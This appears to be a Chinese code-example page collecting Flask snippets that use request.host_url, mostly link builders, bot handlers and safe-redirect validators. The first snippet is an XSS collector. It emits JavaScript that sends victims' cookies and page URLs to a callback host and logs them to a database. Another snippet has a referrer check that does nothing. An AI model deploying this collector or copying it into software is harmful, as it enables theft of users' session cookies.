Python request.host_url方法代码示例

# 需要导入模块: from flask import request [as 别名]
# 或者: from flask.request import host_url [as 别名]
def xss(name, action):
    callback_url = request.host_url + 'xss/' + quote(name) + '/save?l='
    js_body = "(function(){(new Image()).src='" + callback_url + "'+escape((function(){try{return document.location.href}catch(e){return ''}})())+'&t='+escape((function(){try{return top.location.href}catch(e){return ''}})())+'&c='+escape((function(){try{return document.cookie}catch(e){return ''}})())+'&o='+escape((function(){try{return (window.opener && window.opener.location.href)?window.opener.location.href:''}catch(e){return ''}})());})();"
    if action == 'js':
        return js_body
    elif action == 'save':
        args = request.values
        data = [
            name,
            args.get('l', ''),
            args.get('t', ''),
            args.get('o', ''),
            args.get('c', ''), request.remote_addr
        ]
        sql = "INSERT INTO xss (name,location,toplocation,opener,cookie,source_ip,insert_time) \
            VALUES(?, ?, ?, ? ,?, ?, datetime(CURRENT_TIMESTAMP,'localtime'))"

        DB.exec_sql(sql, *data)
        return 'success' 

# 需要导入模块: from flask import request [as 别名]
# 或者: from flask.request import host_url [as 别名]
def get_click():
    """Process GET requests to the /click URI; render the click.html page."""
    global base_grant_url
    global user_continue_url
    global success_url

    host = request.host_url
    base_grant_url = request.args.get('base_grant_url')
    user_continue_url = request.args.get('user_continue_url')
    node_mac = request.args.get('node_mac')
    client_ip = request.args.get('client_ip')
    client_mac = request.args.get('client_mac')
    success_url = host + "success"

    return render_template(
        "click.html",
        client_ip=client_ip,
        client_mac=client_mac,
        node_mac=node_mac,
        user_continue_url=user_continue_url,
        success_url=success_url,
    ) 

# 需要导入模块: from flask import request [as 别名]
# 或者: from flask.request import host_url [as 别名]
def __init__(self, **kwargs):
        """Initialises a new ``Self`` link instance. Accepts the same
        Keyword Arguments as :class:`.Link`.

        Additional Keyword Args:
            external (bool): if true, force link to be fully-qualified URL, defaults to False

        See Also:
            :class:`.Link`
        """

        url = request.url
        external = kwargs.get('external', False)
        if not external and current_app.config['SERVER_NAME'] is None:
            url = request.url.replace(request.host_url, '/')

        return super(Self, self).__init__('self', url, **kwargs) 

# 需要导入模块: from flask import request [as 别名]
# 或者: from flask.request import host_url [as 别名]
def handle_content_message(event):
    if isinstance(event.message, ImageMessage):
        ext = 'jpg'
    elif isinstance(event.message, VideoMessage):
        ext = 'mp4'
    elif isinstance(event.message, AudioMessage):
        ext = 'm4a'
    else:
        return

    message_content = line_bot_api.get_message_content(event.message.id)
    with tempfile.NamedTemporaryFile(dir=static_tmp_path, prefix=ext + '-', delete=False) as tf:
        for chunk in message_content.iter_content():
            tf.write(chunk)
        tempfile_path = tf.name

    dist_path = tempfile_path + '.' + ext
    dist_name = os.path.basename(dist_path)
    os.rename(tempfile_path, dist_path)

    line_bot_api.reply_message(
        event.reply_token, [
            TextSendMessage(text='Save content.'),
            TextSendMessage(text=request.host_url + os.path.join('static', 'tmp', dist_name))
        ]) 

# 需要导入模块: from flask import request [as 别名]
# 或者: from flask.request import host_url [as 别名]
def handle_file_message(event):
    message_content = line_bot_api.get_message_content(event.message.id)
    with tempfile.NamedTemporaryFile(dir=static_tmp_path, prefix='file-', delete=False) as tf:
        for chunk in message_content.iter_content():
            tf.write(chunk)
        tempfile_path = tf.name

    dist_path = tempfile_path + '-' + event.message.file_name
    dist_name = os.path.basename(dist_path)
    os.rename(tempfile_path, dist_path)

    line_bot_api.reply_message(
        event.reply_token, [
            TextSendMessage(text='Save file.'),
            TextSendMessage(text=request.host_url + os.path.join('static', 'tmp', dist_name))
        ]) 

# 需要导入模块: from flask import request [as 别名]
# 或者: from flask.request import host_url [as 别名]
def unlink_oauth(provider):
        if request.host_url + 'me' != request.referrer:
            pass
        query = ub.session.query(ub.OAuth).filter_by(
            provider=provider,
            user_id=current_user.id,
        )
        try:
            oauth_entry = query.one()
            if current_user and current_user.is_authenticated:
                oauth_entry.user = current_user
                try:
                    ub.session.delete(oauth_entry)
                    ub.session.commit()
                    logout_oauth_user()
                    flash(_(u"Unlink to %(oauth)s Succeeded", oauth=oauth_check[provider]), category="success")
                except Exception as e:
                    log.exception(e)
                    ub.session.rollback()
                    flash(_(u"Unlink to %(oauth)s Failed", oauth=oauth_check[provider]), category="error")
        except NoResultFound:
            log.warning("oauth %s for user %d not found", provider, current_user.id)
            flash(_(u"Not Linked to %(oauth)s.", oauth=oauth_check[provider]), category="error")
        return redirect(url_for('web.profile'))


    # notify on OAuth provider error 

# 需要导入模块: from flask import request [as 别名]
# 或者: from flask.request import host_url [as 别名]
def is_safe_url(target):
    ref_url = urlparse(request.host_url)
    test_url = urlparse(urljoin(request.host_url, target))
    return test_url.scheme in ('http', 'https') and ref_url.netloc == test_url.netloc 

# 需要导入模块: from flask import request [as 别名]
# 或者: from flask.request import host_url [as 别名]
def validate_redirect_url(url):
    if url is None or url.strip() == "":
        return False
    url_next = urlsplit(url)
    url_base = urlsplit(request.host_url)
    if (url_next.netloc or url_next.scheme) and url_next.netloc != url_base.netloc:
        return False
    return True 

# 需要导入模块: from flask import request [as 别名]
# 或者: from flask.request import host_url [as 别名]
def is_safe_url(target):
    ref_url = urlparse(request.host_url)
    test_url = urlparse(urljoin(request.host_url, target))
    return test_url.scheme in ('http', 'https') and \
           ref_url.netloc == test_url.netloc 

# 需要导入模块: from flask import request [as 别名]
# 或者: from flask.request import host_url [as 别名]
def is_safe_url(target):
    """
    check if target will lead to the same server
    """
    ref_url = urlparse(request.host_url)
    test_url = urlparse(urljoin(request.host_url, target))
    return test_url.scheme in ('http', 'https') and ref_url.netloc == test_url.netloc 

# 需要导入模块: from flask import request [as 别名]
# 或者: from flask.request import host_url [as 别名]
def get_referrer_url():
    """获取上一页地址"""
    if request.referrer and request.referrer.startswith(request.host_url) and request.endpoint and not "api." in request.endpoint:
        url = request.referrer
    else:
        url = None
    return url 

# 需要导入模块: from flask import request [as 别名]
# 或者: from flask.request import host_url [as 别名]
def from_manifest(app, filename, raw=False, **kwargs):
    '''
    Get the path to a static file for a given app entry of a given type.

    :param str app: The application key to which is tied this manifest
    :param str filename: the original filename (without hash)
    :param bool raw: if True, doesn't add prefix to the manifest
    :return: the resolved file path from manifest
    :rtype: str
    '''
    cfg = current_app.config

    if current_app.config.get('TESTING'):
        return  # Do not spend time here when testing

    path = _manifests[app][filename]

    if not raw and cfg.get('CDN_DOMAIN') and not cfg.get('CDN_DEBUG'):
        scheme = 'https' if cfg.get('CDN_HTTPS') else request.scheme
        prefix = '{}://'.format(scheme)
        if not path.startswith('/'):  # CDN_DOMAIN has no trailing slash
            path = '/' + path
        return ''.join((prefix, cfg['CDN_DOMAIN'], path))
    elif not raw and kwargs.get('external', False):
        if path.startswith('/'):  # request.host_url has a trailing slash
            path = path[1:]
        return ''.join((request.host_url, path))
    return path 

# 需要导入模块: from flask import request [as 别名]
# 或者: from flask.request import host_url [as 别名]
def is_safe_redirect(redirect_url):
    # Fail everything starting with more then one slash
    # http://homakov.blogspot.com/2014/01/evolution-of-open-redirect-vulnerability.html
    if redirect_url.startswith('//'):
        return False
    # Validate given URL to make sure it's still on this server
    current_server = urlparse(request.host_url)
    redirect = urlparse(urljoin(request.host_url, redirect_url))
    return redirect.scheme in ('http', 'https') and \
            redirect.netloc == current_server.netloc 

# 需要导入模块: from flask import request [as 别名]
# 或者: from flask.request import host_url [as 别名]
def info_event_hackathon_json(event_id):
    event = Event.query.filter_by(id=event_id).first_or_404()
    return jsonify(event.get_schema(request.host_url))

# ------ EVENT PROJECTS ---------

# API: Outputs JSON of projects in the current event, along with its info 

# 需要导入模块: from flask import request [as 别名]
# 或者: from flask.request import host_url [as 别名]
def is_safe_url(target):
    from flask import request
    ref_url = urlparse(request.host_url)
    test_url = urlparse(urljoin(request.host_url, target))
    return test_url.scheme in ('http', 'https') and \
        ref_url.netloc == test_url.netloc